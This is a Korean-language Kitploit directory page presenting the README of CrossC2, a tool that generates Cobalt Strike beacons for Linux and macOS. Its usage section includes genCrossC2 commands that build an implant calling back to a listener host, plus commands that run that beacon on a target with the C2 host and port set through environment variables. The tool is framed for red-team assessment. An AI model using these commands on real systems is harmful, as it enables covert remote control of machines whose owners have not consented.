Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CrossC2 — CobaltStrike의 크로스 플랫폼 페이로드 생성 | Kitploit
도구/GitHubGitHub/gloxec/crossc2
Penetration Testing FrameworksExploit FrameworksPayload GenerationPost-ExploitationCommand and ControlRed TeamingPayload Development
GitHubgloxec/crossc2

CrossC2

CobaltStrike의 크로스 플랫폼 페이로드 생성

저장소 보기
2.6k3743년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CrossC2 프레임워크

Linux macOS GitHub issues-closed Release Downloads

CrossC2 로고

README | 중국어 문서 | README_FULL | 중국어 전체 문서

CobaltStrike 지원

다른 플랫폼(Linux/MacOS/...)에 대한 CobaltStrike의 보안 평가를 지원하며, Unix 사후 침투 모듈의 개발 지원을 포함합니다.

2023-07-31 16.56.51

사용법

  1. 다운로드

CrossC2.cna, genCrossC2, CrossC2Kit을 다운로드하고, CrossC2.cna 구성을 수정합니다.

  1. 리스너 생성 및 키 복사
  • windows/beacon_https/reverse_https 리스너 생성
  • teamserver 디렉토리에 있는 .cobaltstrike.beacon_keys를 로컬로 복사
  1. 기능 확장
  • 메모리 로딩 및 기타 기능을 포함하는 CrossC2Kit_Loader.cna를 추가합니다.
  • cs4.x 버전은 파일 관리, 프로세스 목록 기능이 누락되어 있으므로, 이 Loader를 사용하여 다시 시작해야 합니다.
  1. 비콘 생성

기본적으로 cli 또는 cna에서 제공하는 GUI 기능을 사용하여 비콘을 생성합니다.

genCrossC2 <listener-ip/domain> <listener-port> <beacon_keys> <rebind_library;config.ini;c2profile.profile> <target_platform> <target_arch>

예:

root@kitploit:~
1. read BEACON_KEY from current path and generate BEACON of default C2Profile traffic protocol
    genCrossC2 127.0.0.1 5555 null null Linux x64 beacon.out
     
2. specify the BEACON of the custom protocol dynamic library
    genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys c2profile.so MacOS x64 beacon.out

3. specify the C2Profile that needs to be automatically parsed
    genCrossC2 www.example.com 443 .cobaltstrike.beacon_keys ";;c2profile.profile" Linux x64 beacon.out

더 고급 구성은 문서에서 확인할 수 있습니다: 📄참고

  1. 비콘 실행
  • 대상에서 CrossC2 플러그인이 생성한 원클릭 온라인 스크립트를 실행합니다.
  • 비콘을 대상 머신에 업로드한 후 권한 있는 작업을 수행합니다.
  • 비콘의 작업 디렉토리를 설정하고 실행: export CCPATH=/opt/ && /tmp/c2
  • 비콘의 프로토콜 라이브러리를 임시로 지정하고 실행: /tmp/c2 /tmp/c2-rebind.so
  • 비콘의 C2 구성을 임시로 설정: export CCHOST=127.0.0.1 && export CCPORT=443 && /tmp/c2
  • 비콘의 온라인 상태를 보기 위해 DEBUG 설정: export CCDEBUG=1 && /tmp/c2

CrossC2Kit

CrossC2Kit: https://github.com/CrossC2/CrossC2Kit

CrossC2Kit는 CrossC2에서 파생된 Unix 플랫폼 중심의 침투 확장입니다. Aggressor Script 오픈 소스 스크립트 엔진을 사용합니다. 이를 사용하여 레드 팀의 운영 프로세스를 시뮬레이션하는 자동화를 생성하고 CobaltStrike 클라이언트를 확장할 수 있습니다.

CrossC2Kit는 CobaltStrike의 원래 기능을 상속받았으므로 개발 및 작성 문법은 여전히 공식 문서를 참조합니다: https://trial.cobaltstrike.com/aggressor-script/index.html

하지만 Unix 플랫폼의 beacon을 제어하기 위해 CrossC2 위에 몇 가지 API 확장이 있습니다.

API: 📄참고

데모: CrossC2_action2

참고

Only for internal use by enterprises and organizations, this framework has a certain degree of instability. Non-professionals are not allowed to use it. Anyone shall not use it for illegal purposes and profitability. Besides that, publishing unauthorized modified version is also prohibited, or otherwise bear legal responsibilities.

할 일

  1. http-proxy (인증) 및 socks 프록시 역연결 지원
  2. 노드 비콘? (단일 노드 유형, teamserver에 의존하지 않고 다른 비콘을 호스팅 가능)
  3. Linux 및 MacOS 측 so/dylib의 리버스 셸 지원 및 그 파생 프로세스 인젝션 기능

감사

CrossC2를 위해 디자인된 로고에 대해 @Emma에게 감사드립니다. 이 로고는 Armitage 및 CobaltStrike 시리즈 스타일로 디자인되었습니다.

도구 다운로드
CS3.14(bug fixes)CS4.0CS4.X (4.1~4.8)
Master branch✅
cs4.0 branch✅
cs4.1 branch✅
Release Page <= v2.1✅
Release Page >= v2.2✅